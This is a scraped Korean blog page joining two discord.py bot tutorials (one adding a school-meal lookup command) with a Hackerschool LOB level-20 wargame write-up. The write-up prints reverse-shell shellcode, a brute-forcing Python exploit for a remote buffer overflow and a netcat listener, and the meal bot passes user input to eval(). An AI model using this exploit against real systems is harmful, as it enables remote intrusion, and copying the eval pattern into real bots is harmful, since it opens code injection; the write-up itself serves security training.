반응형
반응형

이번에는 저번에 만들었던 디스코드 챗봇에 급식 파서를 활용하여

급식을 알려주는 챗봇을 만들도록 하겠습니다.



이전과정

[

디스코드 챗봇 만들기 --> http://mandu-mandu.tistory.com/64

급식 파서 만들기 --> http://mandu-mandu.tistory.com/21

]





코드 작성하기


필요한 모듈로는, datetime 모듈과 만들어둔 parser.py가 필요합니다.


parser.py를 디스코드 봇 소스가 있는 디렉토리로 옮겨두고


아래 코드를, 디스코드 봇 소스 상단에 추가해줍시다.



import datetime

from parser import *




내일의 식단을 출력하기



먼저, 내일의 식단을 출력하는 코드를 작성하겠습니다.


코드를 작성하기 위해 내일의 식단을 출력하는 그 과정을 구상해 봅시다.


1. 디스코드에서 사용자로부터 명령어를 인식합니다.

저는 '!t' 로 설정하겠습니다.


2. 명령어를 인식한 시점으로부터 다음날의 날짜값과 그 날짜의 요일값을 가져옵니다.

파서의 함수가 필요로 하는 인자가 조식.중식.석식 여부 / 날짜 / 요일이기 때문입니다.

모두 datetime 함수를 사용합니다.


3. 급식을 파싱하는 함수를 호출합니다. 그리고 그 값을 저장합니다.


4. 그 값을 출력합니다.

제가 다니는 학교의 급식 상황을 보면, 조식이 전혀 없고 중식이 없을 경우 100% 석식이 없습니다.

이에 따라 조건절을 추가하여 출력되는 메세지를 '최적화'하였습니다.

(식단 내용 외 날짜등의 정보도 같이 출력해주기 때문입니다.)


중식이 없을 경우 급식이 없다고 출력,

중식이 있고 석식은 없을 경우 중식만 출력,

중식 석식 모두 있을 경우 모두 출력.



이를 코드로 구현하면 아래처럼 됩니다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
    if message.content.startswith('!to'):    #메세지의 내용의 시작이 !to로 시작할 경우
        to_tomorrow = datetime.datetime.today() + datetime.timedelta(days=1)    #오늘 날짜에 하루를 더함
        local_date2 = to_tomorrow.strftime("%Y.%m.%d")    #위에서 구한 날짜를 년.월.일 형식으로 저장
        local_weekday2 = to_tomorrow.weekday()    #위에서  구한 날짜의 요일값을 저장
 
        l_diet = get_diet(2, local_date2, local_weekday2)    #점심식단을 파싱해옴
        d_diet = get_diet(3, local_date2, local_weekday2)    #석식식단을 파싱해옴
 
        if len(l_diet) == 1:    #점심식단의 길이가 1일경우 = parser.py에서 식단이 없을경우 공백한자리를 반환함.
            await client.send_message(message.channel, "급식이 없습니다.")    #급식이 없다고 메세지 보냄
        elif len(d_diet) == 1:    #점심식단의 길이가 1이 아니고 석식식단의 길이가 1일경우 = 점심식단만 있을경우
            lunch = local_date2 + " 중식\n" + l_diet    #날짜와 "중식"을 앞에 붙여서
            await client.send_message(message.channel, lunch)    #메세지 보냄
        else:    #둘다 길이가 1이 아닐경우 = 점심, 석식 식단 모두 있을 경우
            lunch = local_date2 + " 중식\n" + l_diet    #앞에 부가적인 내용을 붙여서
            dinner = local_date2 + " 석식\n" + d_diet
            await client.send_message(message.channel, lunch)    #메세지를 보냄
            await client.send_message(message.channel, dinner)
cs



코드상 

@client.event

async def on_message(message):

아래에 위치하게 됩니다.



상황에 따라 if가 이미 있을 경우

if message.content.startswith('!to'):

if를 elif로 바꿔서 사용해야 합니다. (파이썬의 기본...)




특정 날짜의 식단을 출력하기



이제 날짜값을 주면 그 날짜의 급식을 출력하는 코드를 작성하겠습니다.


코드의 구성은 위 '내일의 식단을 출력하기'의 코드에서 2번의 내용만 수정해 주면 됩니다.


1. 디스코드에서 사용자로부터 명령어를 인식합니다.

저는 '!t' 로 설정하겠습니다.


2. 날짜를 입력하라는 메세지를 보냅니다. 그리고 받은 날짜의 요일값을 구합니다. (코드로 구현하면 길어집니다.)

datetime 모듈을 이용합니다.


3. 급식을 파싱하는 함수를 호출합니다. 그리고 그 값을 저장합니다.


4. 그 값을 출력합니다.

제가 다니는 학교의 급식 상황을 보면, 조식이 전혀 없고 중식이 없을 경우 100% 석식이 없습니다.

이에 따라 조건절을 추가하여 출력되는 메세지를 '최적화'하였습니다.

(식단 내용 외 날짜등의 정보도 같이 출력해주기 때문입니다.)


중식이 없을 경우 급식이 없다고 출력,

중식이 있고 석식은 없을 경우 중식만 출력,

중식 석식 모두 있을 경우 모두 출력.


이를 코드로 구현하면 아래와 같습니다.


 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
   elif message.content.startswith('!g'):
        await client.send_message(message.channel, '날짜를 보내주세요...')    #날짜를 보내달라는 메세지를 보냄
        meal_date = await client.wait_for_message(timeout=15.0, author=message.author)    #제한시간은 15초
 
        if meal_date is None:    #값이 존재하지 않거나 시간이 초과되었을 경우
            await client.send_message(message.channel, '15초내로 입력해주세요. 다시시도 : !g')    #다시 시도하라는 메세지를 보냄
            return
 
        else:    #값이 있다면
            meal_date = str(meal_date.content) # str형으로 변환, (사용자로부터 20180219와 같은 형태로 받아야 합니다.)
            meal_date = '20' + meal_date[:2+ '.' + meal_date[2:4+ '.' + meal_date[4:6]    # 2018.02.19 사이에 점을 추가함
            #(사용자로부터 점이 포함된 값으로 받을경우 위 코드를 삭제해도 됩니다.)
 
            s = meal_date.replace('.'', ')     # 2018, 02, 19 점을 반점으로 교체
            ss = "datetime.datetime(" + s + ").weekday()"    #eval함수를 통해 요일값을 구하기 위한 작업
            try:
                whatday = eval(ss)    #요일값을 구해서 whatday에 저장
            except:    #오류가 날 경우 다시 시도하라는 메세지를 보냄
                await client.send_message(message.channel, '올바른 값으로 다시 시도하세요 : !g')
                return
#이하 '내일 식단을 출력하기'와 같음
            l_diet = get_diet(2, meal_date, whatday)
            d_diet = get_diet(3, meal_date, whatday)
 
            if len(l_diet) == 1:
                l_diet = "급식이 없습니다."
                await client.send_message(message.channel, embed=l_diet)
            elif len(d_diet) == 1:
                lunch = meal_date + " 중식\n" + l_diet
                await client.send_message(message.channel, embed=lunch)
            else:
                lunch = meal_date + " 중식\n" + l_diet
                dinner = meal_date + " 석식\n" + d_diet
                await client.send_message(message.channel, lunch)
                await client.send_message(message.channel, dinner)
 
cs

파서의 함수를 호출하는 부분에서 윗부분이 많이 복잡해진 것을 알 수 있습니다.

아래부분은 기존과 변화가 없기 때문에 주석을 달지 않았습니다.



위 둘을 합친 전체 코드는 아래와 같게 됩니다.



1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
import discord
import asyncio
import datetime
from parser import *
 
 
client = discord.Client()
 
@client.event
async def on_ready():
    print('Logged in as')
    print(client.user.name)
    print(client.user.id)
    print('------')
 
@client.event
async def on_message(message):
    if message.content.startswith('!to'):    #메세지의 내용의 시작이 !to로 시작할 경우
        to_tomorrow = datetime.datetime.today() + datetime.timedelta(days=1)    #오늘 날짜에 하루를 더함
        local_date2 = to_tomorrow.strftime("%Y.%m.%d")    #위에서 구한 날짜를 년.월.일 형식으로 저장
        local_weekday2 = to_tomorrow.weekday()    #위에서  구한 날짜의 요일값을 저장
 
        l_diet = get_diet(2, local_date2, local_weekday2)    #점심식단을 파싱해옴
        d_diet = get_diet(3, local_date2, local_weekday2)    #석식식단을 파싱해옴
 
        if len(l_diet) == 1:    #점심식단의 길이가 1일경우 = parser.py에서 식단이 없을경우 공백한자리를 반환함.
            await client.send_message(message.channel, "급식이 없습니다.")    #급식이 없다고 메세지 보냄
        elif len(d_diet) == 1:    #점심식단의 길이가 1이 아니고 석식식단의 길이가 1일경우 = 점심식단만 있을경우
            lunch = local_date2 + " 중식\n" + l_diet    #날짜와 "중식"을 앞에 붙여서
            await client.send_message(message.channel, lunch)    #메세지 보냄
        else:    #둘다 길이가 1이 아닐경우 = 점심, 석식 식단 모두 있을 경우
            lunch = local_date2 + " 중식\n" + l_diet    #앞에 부가적인 내용을 붙여서
            dinner = local_date2 + " 석식\n" + d_diet
            await client.send_message(message.channel, lunch)    #메세지를 보냄
            await client.send_message(message.channel, dinner)
 
 
   elif message.content.startswith('!g'):
        await client.send_message(message.channel, '날짜를 보내주세요...')    #날짜를 보내달라는 메세지를 보냄
        meal_date = await client.wait_for_message(timeout=15.0, author=message.author)    #제한시간은 15초
 
        if meal_date is None:    #값이 존재하지 않거나 시간이 초과되었을 경우
            await client.send_message(message.channel, '15초내로 입력해주세요. 다시시도 : !g')    #다시 시도하라는 메세지를 보냄
            return
 
        else:    #값이 있다면
            meal_date = str(meal_date.content) # str형으로 변환, (사용자로부터 20180219와 같은 형태로 받아야 합니다.)
            meal_date = '20' + meal_date[:2+ '.' + meal_date[2:4+ '.' + meal_date[4:6]    # 2018.02.19 사이에 점을 추가함
            #(사용자로부터 점이 포함된 값으로 받을경우 위 코드를 삭제해도 됩니다.)
 
            s = meal_date.replace('.'', ')     # 2018, 02, 19 점을 반점으로 교체
            ss = "datetime.datetime(" + s + ").weekday()"    #eval함수를 통해 요일값을 구하기 위한 작업
            try:
                whatday = eval(ss)    #요일값을 구해서 whatday에 저장
            except:    #오류가 날 경우 다시 시도하라는 메세지를 보냄
                await client.send_message(message.channel, '올바른 값으로 다시 시도하세요 : !g')
                return
            #이하 '내일 식단을 출력하기'와 같음
            l_diet = get_diet(2, meal_date, whatday)
            d_diet = get_diet(3, meal_date, whatday)
 
            if len(l_diet) == 1:
                l_diet = "급식이 없습니다."
                await client.send_message(message.channel, embed=l_diet)
            elif len(d_diet) == 1:
                lunch = meal_date + " 중식\n" + l_diet
                await client.send_message(message.channel, embed=lunch)
            else:
                lunch = meal_date + " 중식\n" + l_diet
                dinner = meal_date + " 석식\n" + d_diet
                await client.send_message(message.channel, lunch)
                await client.send_message(message.channel, dinner)
 
client.run('token')
 
cs



# 글을 작성하면서 보니

#[23,35]과 [59,72]가 하는 일이 같은데

#함수로 하나 정의해서 같이 쓰는게

#효율적일 것 같다는 생각이 듭니다..


#지금은 귀찮으니 PASS


#############

18.03.03 추가

!g 를 통해 특정 날짜의 급식을 부르는 과정에서

날짜값을 받고 처리하는 과정에서 한자리 달의 경우 오류가 발생,

이 부분을 수정하여 한자리 달의 경우도 가능합니다.

수정된 코드는 깃허브를 확인.

https://github.com/M4ndU/inhun_discord_chat_bot_2

############


반응형
저작자표시 비영리 동일조건

'Project > Programming' 카테고리의 다른 글

[Python] Python으로 카카오톡 봇 만들기 (2) - 급식 파서 활용하기  (14) 2018.02.22
[Python] Python으로 카카오톡 봇 만들기 (1) - 봇 생성부터 테스트까지  (25) 2018.02.21
[Python] Python으로 디스코드 봇 만들기 (3) - 부가적 기능 추가하기  (5) 2018.02.19
[Python] Python으로 디스코드 봇 만들기 (1) - 봇 생성부터 테스트까지  (76) 2018.02.19
[Python] Beautifulsoup로 급식 식단 파서 만들기  (6) 2017.12.04
반응형

이 글만을 통해서 기본적으로 텍스트를 출력하는 디스코드 봇을 만들 수 있습니다.


1. 봇 생성하고 초대하기

2. 코드 작성하기

3. 테스트 하기



봇 생성하고 초대하기


먼저 봇 계정을 생성해 주어야 합니다.



디스코드 홈페이지로 이동합니다. -> https://discordapp.com/



상단에 알아보기 > 개발자





APPLICATIONS > My Apps 에서 New App을 누릅니다.





이름, 설명, 아이콘을 설정하고 Create App을 누릅니다.





내려서 Create a Bot User을 누릅니다.





Yes, do it!





Token: click to reveal 을 눌러서 토큰 값을 확인합니다. 이 값은 외부에 유출되어서는 안됩니다.


Public Bot을 체크하게 되면 누구나 봇을 서버에 추가할 수 있게 됩니다. 체크하지 않을 경우 오직 주인만이 서버에 추가할 수 있습니다.


Require OAuth2 Code Grant 는 모르겠습니다.. 아시는 분은 덧글 남겨주세요 ㅎㅎ





이번에는 봇 추가 링크를 만들겠습니다.

Generate OAuth2 URL을 클릭합니다.





CLIENT ID에 클라이언트 아이디를 입력합니다. 아마 자동으로 입력되어 있을거에요.

SCOPES에서 bot에 체크합니다.


그러면 밑에 탭이 하나 더 생깁니다.





권한 설정을 할 수 있는데요. 저는 Send Messages 와 Read Message History 이 두개만 체크해 두었습니다.


다시 위로 올라가서 생성된 URL을 복사합니다.


복사된 url로 접속하시고 자신의 서버를 선택하신뒤

승인 버튼을 누르고 리캡챠 체크 하시면 자신의 서버에 봇이 들어와 있게 됩니다.


현재 봇은 오프라인 상태가 됩니다.



코드 작성하기



개발환경 : UBUNTU 16.04.3

개발언어: PYTHON 3.5.2

텍스트 에디터: ATOM


디스코드 봇을 파이썬으로 작성하기 편하게 제작된 모듈이 있습니다.

아래 링크에 들어가서 discord.py를 설치합니다.

설치방법은 아래 링크에 모두 있습니다.


 바로가기 <-- (https://github.com/Rapptz/discord.py)




설치를 마쳤다면,

이제 텍스트 에디터로 가서 소스를 작성해 봅시다.



[2019년 공지사항]

discord.py 모듈의 업데이트로 client.send_message를 사용할 수 없습니다.

대신 message.channel.send를 이용하시면 됩니다.

아래 코드에는 수정되지 않은 상태로 올라가있으니 수정하셔서 사용하시면 됩니다.





기본적인 소스는 다음과 같습니다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import discord
import asyncio
 
client = discord.Client()
 
@client.event
async def on_ready():
    print('Logged in as')
    print(client.user.name)
    print(client.user.id)
    print('------')
 
@client.event
async def on_message(message):
    if message.content.startswith('!test'):
        await client.send_message(message.channel, 'test!!!!')
 
    elif message.content.startswith('!say'):
        await client.send_message(message.channel, 'leave message')
        msg = await client.wait_for_message(timeout=15.0, author=message.author)
 
        if msg is None:
            await client.send_message(message.channel, '15초내로 입력해주세요. 다시시도: !say')
            return
        else:
            await client.send_message(message.channel, msg.content)
 
client.run('token')
 
cs



위에서부터 소스를 분석해보죠.


@client.event

async def on_ready():

    print('Logged in as')

    print(client.user.name)

    print(client.user.id)

    print('------')



봇을 실행하여 로그인에 성공하면, 위에 문장을 출력하게 됩니다.

(터미널 or 콘솔창에 출력됩니다.)

디스코드 내에서는 봇이 온라인으로 표시됩니다.




@client.event

async def on_message(message):

    if message.content.startswith('!test'):

        await client.send_message(message.channel, 'test!!!!')

 


디스코드 텍스트 채널에 !test 라고 메세지를 보내면 봇이 test!!!!라고 메세지를 보냅니다.




    elif message.content.startswith('!say'):

        await client.send_message(message.channel, 'leave message')

        msg = await client.wait_for_message(timeout=15.0, author=message.author)

 


디스코드 텍스트 채널에 !say 라고 메세지를 보내면 봇이 leave message 라고 메세지를 보냅니다.

그리고 15초 동안 그 사용자의 메세지를 기다립니다. 그리고 그 사용자의 메세지를 msg에 저장합니다.


제한시간은 timout의 값을 변경하여 설정할 수 있습니다.




        if msg is None:

            await client.send_message(message.channel, '15초내로 입력해주세요. 다시시도: !say')

            return

        else:

            await client.send_message(message.channel, msg.content)

 


msg의 값이 존재하지 않을경우 (=사용자가 메세지를 보내지 않았을 경우)

문장을 하나 출력합니다.


msg의 값이 존재할 경우 (=사용자가 메세지를 보냈을 경우)

그 메세지를 그대로 보냅니다.




client.run('token')



token자리에 자신의 봇의 토큰값으로 코드를 수정해 주고 실행해야 합니다.


ex) client.run('AAAAAAA.111111111_BBBBBB')


작은따옴표 주의






테스트 하기



코드를 작성하고 저장을 했다면, 이제 실행을 해줍시다.



터미널에서 봇이 로그인이 되었는지 확인하고 디스코드로 갑니다.




로그인이 되었다면, 봇이 온라인으로 표시될 겁니다.




텍스트 채널에서 메세지를 보내서 봇이 정상적으로 동작하는지 확인합니다.




만약 디스코드내에서 봇이 응답하지 못하고, 터미널에서 위와같은 오류가 났을경우,

디스코드 텍스트 채널에서 권한이 없어서 메세지를 보내지 못하는 것이므로

봇에 권한설정을 해 주시면 해결됩니다.

반응형
저작자표시 비영리 동일조건

'Project > Programming' 카테고리의 다른 글

[Python] Python으로 카카오톡 봇 만들기 (2) - 급식 파서 활용하기  (14) 2018.02.22
[Python] Python으로 카카오톡 봇 만들기 (1) - 봇 생성부터 테스트까지  (25) 2018.02.21
[Python] Python으로 디스코드 봇 만들기 (3) - 부가적 기능 추가하기  (5) 2018.02.19
[Python] Python으로 디스코드 봇 만들기 (2) - 급식 파서 활용하기  (0) 2018.02.19
[Python] Beautifulsoup로 급식 식단 파서 만들기  (6) 2017.12.04
반응형


해커스쿨 LOB LEVEL20 [xavius -> death_knight] 풀이

M4ndU



해커스쿨 LOB [xavius -> death_knight] 풀이입니다.


ID | xavius

PW | throw me away

으로 로그인합니다.



\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.


$ bash2


그리고


$ ls -l


를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,


$ cat [문제이름].c


를 이용해 소스코드를 확인합시다.



login: xavius

Password:

[xavius@localhost xavius]$ bash2

[xavius@localhost xavius]$ ls -l

total 20

-rwsr-sr-x    1 death_kn death_kn    14134 Mar 30  2010 death_knight

-rw-r--r--    1 root     root         1409 Mar 30  2010 death_knight.c

[xavius@localhost xavius]$ cat death_knight.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - dark knight

        - remote BOF

*/


#include <stdio.h>

#include <stdlib.h>

#include <errno.h>

#include <string.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <sys/socket.h>

#include <sys/wait.h>

#include <dumpcode.h>


main()

{

        char buffer[40];


        int server_fd, client_fd;

        struct sockaddr_in server_addr;

        struct sockaddr_in client_addr;

        int sin_size;


        if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){

                perror("socket");

                exit(1);

        }


        server_addr.sin_family = AF_INET;

        server_addr.sin_port = htons(6666);

        server_addr.sin_addr.s_addr = INADDR_ANY;

        bzero(&(server_addr.sin_zero), 8);


        if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){

                perror("bind");

                exit(1);

        }


        if(listen(server_fd, 10) == -1){

                perror("listen");

                exit(1);

        }


        while(1) {

                sin_size = sizeof(struct sockaddr_in);

                if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){

                        perror("accept");

                        continue;

                }


                if (!fork()){

                        send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);

                        send(client_fd, "You : ", 6, 0);

                        recv(client_fd, buffer, 256, 0);

                        close(client_fd);

                        break;

                }


                close(client_fd);

                while(waitpid(-1,NULL,WNOHANG) > 0);

        }

        close(server_fd);

}



드디어 LOB 마지막 이네요.


소스를 보니 원격으로 쉘을 따야 하는 것 같네요.



buffer의 위치를 확인하겠습니다.


...

0x8048a02 <main+318>:   add    %esp,16

0x8048a05 <main+321>:   push   0

0x8048a07 <main+323>:   push   0x100

0x8048a0c <main+328>:   lea    %eax,[%ebp-40]

0x8048a0f <main+331>:   push   %eax

0x8048a10 <main+332>:   mov    %eax,DWORD PTR [%ebp-48]

0x8048a13 <main+335>:   push   %eax

0x8048a14 <main+336>:   call   0x804860c <recv>

...


사이에 더미는 없네요. 바로 리턴주소를 덮으면 될 것 같습니다.

포트6666으로 접속하면 되겠네요.

쉘코드는 리버스 쉘코드를 사용합니다.

"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
IPADDR"\x66\x68"PORT"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80"

IPADDR | 192.168.31.1 (\xc0\xa8\x1f\x01)
PORT | 51000 (\xc7\x38)
로 했습니다.


버퍼의 위치를 정확하게 알 수 없기 때문에 0xbfffffff부터 0xbfff0000까지 브루트포싱을 합니다.


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from socket import *
from struct import *
 
 
= lambda x : pack("<L", x)
up = lambda x : unpack("<L", x)[0]
 
IPADDR = "\xc0\xa8\x1f\x01"
PORT = "\xc7\x38"
 
shellcode = (
 
            "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
            "\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
            "\x01\x6a\x02\x89\xe1\xcd\x80\x89"
            "\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
            +IPADDR+"\x66\x68"+PORT+"\x66\x53\xfe"
            "\xc3\x89\xe1\x6a\x10\x51\x56\x89"
            "\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
            "\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
            "\xc0\x52\x68\x6e\x2f\x73\x68\x68"
            "\x2f\x2f\x62\x69\x89\xe3\x52\x53"
            "\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
            "\x80"
)
 
 
for i in range(0xFF0x00-1):
    for j in range(0xFF0x00-1):
        payload="A"*44+chr(j)+chr(i)+"\xff\xbf"+"\x90"*80+shellcode
        print "addr : " + str(hex(up(chr(j)+chr(i)+"\xff\xbf")))
        s=socket(AF_INET, SOCK_STREAM)
        s.connect(("192.168.31.129"6666))
        s.recv(52)
        s.recv(6)
        s.send(payload)
        s.close()
cs


mandu@mandu-VirtualBox:~$ nc -l -p 51000
my-pass

51000포트 열어놓고 명령어를 미리 입력해두었습니다.


mandu@mandu-VirtualBox:~/project/pytest$ python lob20.py 
(생략)
addr : 0xbffffdf1
addr : 0xbffffdf0
addr : 0xbffffdef
addr : 0xbffffdee
(생략)


기다려보면 어느순간 쉘이 연결되서 패스워드가 출력됩니다.


mandu@mandu-VirtualBox:~$ nc -l -p 51000
my-pass
euid = 520
got the life


이 패스워드로 death_knight 계정에 로그인을 하면?

login: death_knight
Password:
[death_knight@localhost death_knight]$ ls -l
total 4
-rw-r-----    1 death_kn death_kn      636 Mar 30  2010 dropped_item.txt
[death_knight@localhost death_knight]$ cat dropped_item.txt

 You're so great! This is a token to the next gate.

                   ,.
                 ,'  `.
               ,' _<>_ `.
             ,'.-'____`-.`.
           ,'_.-''    ``-._`.
         ,','      /\      `.`.
       ,' /.._  O /  \ O  _.,\ `.
     ,'/ /  \ ``-;.--.:-'' /  \ \`.
   ,' : :    \  /\`.,'/\  /    : : `.
  < <>| |   O >(< (  ) >)< O   | |<> >
   `. : :    /  \/,'`.\/  \    ; ; ,'
     `.\ \  /_..-:`--';-.._\  / /,'
       `. \`'   O \  / O   `'/ ,'
         `.`._     \/     _,','
           `..``-.____.-'',,'
             `.`-.____.-','
               `.  <>  ,'
                 `.  ,'
                   `'

(텍스트로 긁어왔더니 찌그러졌습니다..)


몹이 아이템을 드랍했습니다!

다음은 페도라성인가요? 가즈아ㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏ


반응형
저작자표시 비영리 동일조건

'System Hacking > LOB Redhat' 카테고리의 다른 글

해커스쿨 LOB LEVEL19 [nightmare -> xavius] 풀이  (0) 2018.02.15
해커스쿨 LOB LEVEL18 [succubus -> nightmare] 풀이  (4) 2018.02.14
해커스쿨 LOB LEVEL17 [zombie_assassin -> succubus] 풀이  (0) 2018.02.14
해커스쿨 LOB LEVEL16 [assassin -> zombie_assassin] 풀이  (0) 2018.02.13
해커스쿨 LOB LEVEL15 [giant -> assassin] 풀이  (0) 2018.02.13

+ Recent posts

티스토리툴바